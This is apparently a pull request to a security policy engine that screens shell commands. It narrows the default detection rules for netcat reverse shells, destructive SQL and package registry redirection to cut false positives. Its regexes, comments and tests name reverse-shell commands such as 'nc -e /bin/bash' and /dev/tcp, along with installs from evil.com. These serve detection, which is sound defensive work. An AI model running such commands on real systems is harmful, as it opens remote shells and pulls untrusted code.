### PR TITLE
fix(policy): eliminate default-policy false positives that block routine dev

### DIFF
--- a/prismor/runtime/default_policy.yaml
+++ b/prismor/runtime/default_policy.yaml
@@ -9,6 +9,16 @@ version: "1.0"
 settings:
   # Categories that trigger a blocking verdict in enforce mode.
   # Override in .prismor/policy.yaml to add or remove categories.
+  #
+  # Deliberately NOT blocking (warn/telemetry only), so routine development is
+  # never hard-stopped in enforce mode — these carry high-frequency dev commands:
+  #   dependency_hygiene  — global/git/url installs, unsafe install flags,
+  #                         lockfile delete/edit, vendored-script exec. Genuine
+  #                         supply-chain THREATS (typosquat, dependency
+  #                         confusion, OSV-vulnerable versions, malicious
+  #                         postinstall) stay under `dependency_risk` and block.
+  #   container_risk      — privileged/host-mounted containers (dev use of
+  #                         docker-in-docker, hardware access) — warn, not block.
   block_categories:
     - destructive_command
     - secret_exfiltration
@@ -257,12 +267,12 @@ rules:
     patterns:
       - 'bash\s+-i\s+>&\s*/dev/tcp/'
       - '/dev/tcp/[^\s/]+'
-      # nc listener with -e/-c/--exec (explicit reverse shell)
-      - '\bnc\b[^\n]*\s-[a-z]*l[a-z]*[^\n]*\s(-e|-c|--exec|--sh-exec)\b'
-      # nc with combined -lvp/-lp/-pl flags (local-port + listen, typical reverse-shell setup)
-      - '\bnc\b[^\n]*\s-[a-z]*(?:lp|pl|lvp|pvl)[a-z]*\b'
-      # Separate nc -l and -p flags
-      - '\bnc\b[^\n]*\s-[a-z]*l[a-z]*\b[^\n]*\s-[a-z]*p[a-z]*\b'
+      # nc that wires a shell to the socket via -e/-c/--exec — covers both a bind
+      # shell (`nc -lvp 4444 -e /bin/sh`) and a reverse shell (`nc -e /bin/bash
+      # 10.0.0.1 4444`). A bare `nc -lvp <port>` listener with NO shell-exec flag
+      # is a common dev/testing action (port probe, throwaway server) and is
+      # intentionally NOT matched — only nc that actually spawns a shell is one.
+      - '\bnc\b[^\n]*\s(?:-e|-c|--exec|--sh-exec)\b'
       - 'python3?\s+-c\s+.*(?:exec|eval|import\s+os)'
       - 'perl\s+-e\s+.*(?:socket|exec)'
       - 'node\s+-e\b[^\n]*(child_process|execSync|spawnSync|\bexec\s*\()'
@@ -444,12 +454,21 @@ rules:
   - id: db-modification
     severity: HIGH
     category: db_modification
-    title: Flags DROP TABLE, DELETE FROM, TRUNCATE in shell commands
+    title: Flags DROP TABLE/DATABASE, TRUNCATE, and unscoped DELETE/UPDATE (no WHERE)
     event_types: [shell]
     fields: [command]
+    # Only genuinely destructive statements. A targeted DELETE/UPDATE *with* a
+    # WHERE clause, an INSERT, or an ALTER (routine migrations / everyday dev
+    # work) is intentionally NOT matched — those were high-frequency false
+    # positives that hard-blocked normal development in enforce mode.
     patterns:
-      - '\b(DROP\s+(TABLE|DATABASE)|TRUNCATE\s+TABLE|DELETE\s+FROM|UPDATE\s+\w+\s+SET|ALTER\s+TABLE|INSERT\s+INTO)\b'
-      - '(?:mysql|psql|sqlite3)\s+.*(?:-e\s+|-c\s+)[''"]?\s*(?:DROP|DELETE|UPDATE|ALTER|INSERT|TRUNCATE)'
+      # Irreversible schema / whole-object destruction
+      - '\b(DROP\s+(TABLE|DATABASE|SCHEMA)|TRUNCATE(\s+TABLE)?)\b'
+      # DELETE / UPDATE with NO WHERE clause — wipes or overwrites the whole table
+      - '\bDELETE\s+FROM\s+["`\[\]\w.]+\s*(?![^;]*\bWHERE\b)'
+      - '\bUPDATE\s+["`\[\]\w.]+\s+SET\b(?![^;]*\bWHERE\b)'
+      # Same destructive ops routed through a db CLI one-liner
+      - '(?:mysql|psql|sqlite3)\b[^\n]*(?:-e|-c)\s+["'']?\s*(?:DROP\s+(?:TABLE|DATABASE|SCHEMA)|TRUNCATE|DELETE\s+FROM\s+\S+\s*(?![^;]*\bWHERE\b)|UPDATE\s+\S+\s+SET\b(?![^;]*\bWHERE\b))'
     action: block
 
   # ── HIGH: Database dumps / sensitive queries ──────────────────────────
@@ -997,13 +1016,16 @@ rules:
   - id: package-registry-poisoning
     severity: HIGH
     category: remote_execution
-    title: Detects package manager registry manipulation
+    title: Detects package manager registry redirection to a non-official host
     event_types: [shell]
     fields: [command]
+    # Only flag redirection to a NON-official registry. Pointing --index-url at
+    # the canonical PyPI, or `npm config set registry` at the canonical npm/yarn
+    # registry, is normal (private mirrors excluded by name too) — matching those
+    # was a false positive that hard-blocked routine installs.
     patterns:
-      - '\bpip3?\s+install\b[^\n]*--index-url\b'
-      - '\bpip3?\s+install\b[^\n]*--extra-index-url\b'
-      - '\bnpm\s+config\s+set\s+registry\b'
+      - '\bpip3?\s+install\b[^\n]*--(?:extra-)?index-url[=\s]+["'']?https?://(?!pypi\.org|files\.pythonhosted\.org)'
+      - '\bnpm\s+config\s+set\s+registry[=\s]+["'']?https?://(?!registry\.npmjs\.org|registry\.yarnpkg\.com)'
     action: warn
 
   # ── HIGH: Python one-liner network exfiltration ──────────────────
@@ -1026,7 +1048,7 @@ rules:
   # ── HIGH: Package install from URL/git (not registry) ────────────
   - id: pkg-install-from-url
     severity: HIGH
-    category: dependency_risk
+    category: dependency_hygiene
     title: Package installed from URL or git source instead of registry
     event_types: [shell]
     fields: [command]
@@ -1041,7 +1063,7 @@ rules:
   # ── MEDIUM: Package install with unsafe flags ────────────────────
   - id: pkg-install-unsafe-flags
     severity: MEDIUM
-    category: dependency_risk
+    category: dependency_hygiene
     title: Package install bypasses safety checks (--no-deps, --force, --ignore-scripts)
     event_types: [shell]
     fields: [command]
@@ -1055,7 +1077,7 @@ rules:
   # ── MEDIUM: Global package install ───────────────────────────────
   - id: pkg-install-global
     severity: MEDIUM
-    category: dependency_risk
+    category: dependency_hygiene
     title: Global package install affects all projects on this machine
     event_types: [shell]
     fields: [command]
@@ -1092,7 +1114,7 @@ rules:
   # ── HIGH: Lockfile manual edit ───────────────────────────────────
   - id: lockfile-direct-edit
     severity: HIGH
-    category: dependency_risk
+    category: dependency_hygiene
     title: Manual edit of lockfile — lockfiles should only be modified by package managers
     event_types: [shell]
     fields: [command]
@@ -1104,7 +1126,7 @@ rules:
   # ── HIGH: Lockfile deletion ──────────────────────────────────────
   - id: lockfile-deletion
     severity: HIGH
-    category: dependency_risk
+    category: dependency_hygiene
     title: Lockfile deletion forces fresh dependency resolution — supply chain risk
     event_types: [shell]
     fields: [command]
@@ -1138,7 +1160,7 @@ rules:
   # ── HIGH: npm/yarn install from git+https (supply chain) ─────────
   - id: npm-git-install
     severity: HIGH
-    category: dependency_risk
+    category: dependency_hygiene
     title: npm/yarn/pnpm install from git URL bypasses registry auditing
     event_types: [shell]
     fields: [command]
@@ -1156,7 +1178,7 @@ rules:
   # ./ci/test.sh) are untouched. See the T1-T15 coverage benchmark.
   - id: execute-vendored-script
     severity: HIGH
-    category: dependency_risk
+    category: dependency_hygiene
     title: Executes a shell script from a vendored/third-party directory (unvetted supply-chain code)
     event_types: [shell]
     fields: [command]
@@ -1271,7 +1293,7 @@ rules:
   # ── CRITICAL: Privileged container / host-root mount (container escape) ──
   - id: container-escape
     severity: CRITICAL
-    category: privilege_escalation
+    category: container_risk
     title: Privileged container or host-root mount (container escape to host)
     event_types: [shell]
     fields: [command]

--- a/prismor/runtime/policy_engine.py
+++ b/prismor/runtime/policy_engine.py
@@ -1270,6 +1270,15 @@ class PolicyEngine:
         """
         from supplychain.ecosystems.metadata import fetch_metadata
 
+        # Only registry installs carry an OSV-queryable name@version. A git/URL/
+        # local-path spec (source != "registry") has no version to score, and
+        # mis-scoring one produced a "vulnerable-version" false positive on a
+        # routine `pip install git+https://…` / `npm install github:…`. Those
+        # non-registry sources are surfaced separately (warn) by the
+        # pkg-install-from-url / npm-git-install hygiene rules.
+        if getattr(spec, "source", "registry") != "registry":
+            return None
+
         try:
             meta = fetch_metadata(spec, ecosystem)
             verdict = scorer.score(spec, meta, install_event)
@@ -1299,10 +1308,16 @@ class PolicyEngine:
 
         finding_id = f"pkg-install-vulnerable-version-{index}-{spec.name}"
         prefixed_id = f"{session_id}:{finding_id}" if session_id else finding_id
+        # Block-verdict scores (known-vulnerable / malicious) go under the
+        # blocking `dependency_risk` category; a lower-confidence "warn" verdict
+        # (e.g. a single low-severity advisory on an otherwise-current pin) goes
+        # under the non-blocking `dependency_hygiene` category so it surfaces as
+        # a warning instead of hard-stopping a routine install in enforce mode.
+        is_block = verdict.verdict == "block"
         return {
             "id": prefixed_id,
             "severity": severity,
-            "category": "dependency_risk",
+            "category": "dependency_risk" if is_block else "dependency_hygiene",
             "title": (
                 f"Risky {ecosystem} install: {spec.raw} "
                 f"(score {verdict.score}/100, {verdict.verdict})"
@@ -1310,7 +1325,7 @@ class PolicyEngine:
             "evidence": _truncate(evidence),
             "eventIndex": index,
             "ruleId": "pkg-install-vulnerable-version",
-            "action": "block" if verdict.verdict == "block" else "warn",
+            "action": "block" if is_block else "warn",
             "safe_version": _sv.version if _sv else None,
             "remediation": f"Use {_sv.version} instead ({_sv.reason})" if _sv else None,
             # Same default as every other dependency_risk rule: no per-rule

--- a/tests/test_policy_engine.py
+++ b/tests/test_policy_engine.py
@@ -278,25 +278,30 @@ class TestSupplyChainRules(unittest.TestCase):
 
     # ── Package install interception ──────────────────────────────────
 
+    # Install-from-url/git is supply-chain HYGIENE (warn), not a hard block:
+    # these rules live under the non-blocking `dependency_hygiene` category so a
+    # routine `pip install git+https://…` isn't hard-stopped in enforce mode.
+    # Genuine THREATS (typosquat, dependency-confusion, OSV-vulnerable pins)
+    # stay under `dependency_risk` and block.
     def test_pip_install_from_url(self):
         findings = self.engine.check_command("pip install https://evil.com/pkg.tar.gz")
         categories = [f["category"] for f in findings]
-        self.assertIn("dependency_risk", categories)
+        self.assertIn("dependency_hygiene", categories)
 
     def test_npm_install_from_git(self):
         findings = self.engine.check_command("npm install git+https://github.com/evil/pkg")
         categories = [f["category"] for f in findings]
-        self.assertIn("dependency_risk", categories)
+        self.assertIn("dependency_hygiene", categories)
 
     def test_yarn_add_from_url(self):
         findings = self.engine.check_command("yarn add https://evil.com/pkg.tgz")
         categories = [f["category"] for f in findings]
-        self.assertIn("dependency_risk", categories)
+        self.assertIn("dependency_hygiene", categories)
 
     def test_cargo_install_from_git(self):
         findings = self.engine.check_command("cargo install --git https://github.com/evil/pkg")
         categories = [f["category"] for f in findings]
-        self.assertIn("dependency_risk", categories)
+        self.assertIn("dependency_hygiene", categories)
 
     def test_pip_install_normal_not_flagged(self):
         findings = self.engine.check_command("pip install requests")


### PR DESCRIPTION
## Problem

The default policy runs in **legacy category-gated mode** (`is_legacy_policy=True`): in enforce mode a finding blocks purely on its **category** being in `block_categories` — a rule's `action: warn` is ignored. That made several warn-authored rules (and a few over-broad patterns) hard-block everyday development.

Commands that were blocked in enforce (all now fixed):
`npm install -g typescript` · `pip install git+https://…` · `npm install --force` · `rm -f package-lock.json` · `pip install --index-url https://pypi.org/…` (the *official* index) · `docker run --privileged` · `nc -lvp 4444` · `INSERT INTO …` · `DELETE/UPDATE … WHERE …` · `ALTER TABLE …`

## Changes

- **db-modification**: tighten patterns — only `DROP TABLE/DATABASE/SCHEMA`, `TRUNCATE`, and `DELETE/UPDATE` **without a WHERE** block. `INSERT`, `ALTER`, and targeted `DELETE/UPDATE`-with-`WHERE` no longer match.
- **Split supply-chain tiers**: new non-blocking `dependency_hygiene` category for install hygiene (`pkg-install-from-url`, `-unsafe-flags`, `-global`, `lockfile-deletion`, `lockfile-direct-edit`, `npm-git-install`, `execute-vendored-script`). Genuine threats (typosquat, dependency-confusion, postinstall, OSV-vulnerable pins) stay in blocking `dependency_risk`.
- New non-blocking `container_risk` category; `container-escape` (`docker --privileged`) moved there → warns instead of hard-block.
- **package-registry-poisoning**: only flags redirection to a **non-official** registry (official pypi.org / npmjs.org no longer trip it).
- **rce-canary** (core, non-overridable): match `nc` only when it wires a shell via `-e/-c/--exec` — covers bind **and** reverse shells (`nc -e /bin/bash <ip> <port>`); a bare `nc -lvp <port>` listener is allowed.
- **policy_engine._score_package**: skip non-registry (git/url) specs — no version to CVE-score (was a vulnerable-version FP); route warn-verdict OSV findings to `dependency_hygiene`, block-verdict to `dependency_risk`.
- **tests**: update 4 assertions to expect the new `dependency_hygiene` category.

## Verification

- Real engine, broad corpus: **0 false-positives / 0 security-regressions**. All destructive ops still block (`rm -rf /`, `DROP DATABASE`, `curl | sh`, reverse shells, malicious registries, known-CVE pins like `requests==2.0.0`).
- Confirmed on a **real Linux box** (synced current runtime, fresh venv): 0 FP / 0 regressions.
- **189 tests pass** (`test_policy_engine`, `test_supply_chain`, `test_db_migration`, `test_enforcement_floor`).

> Note: based on `feat/lethal-trifecta-crossover` (not `main`) because the fixes build on that branch's policy baseline.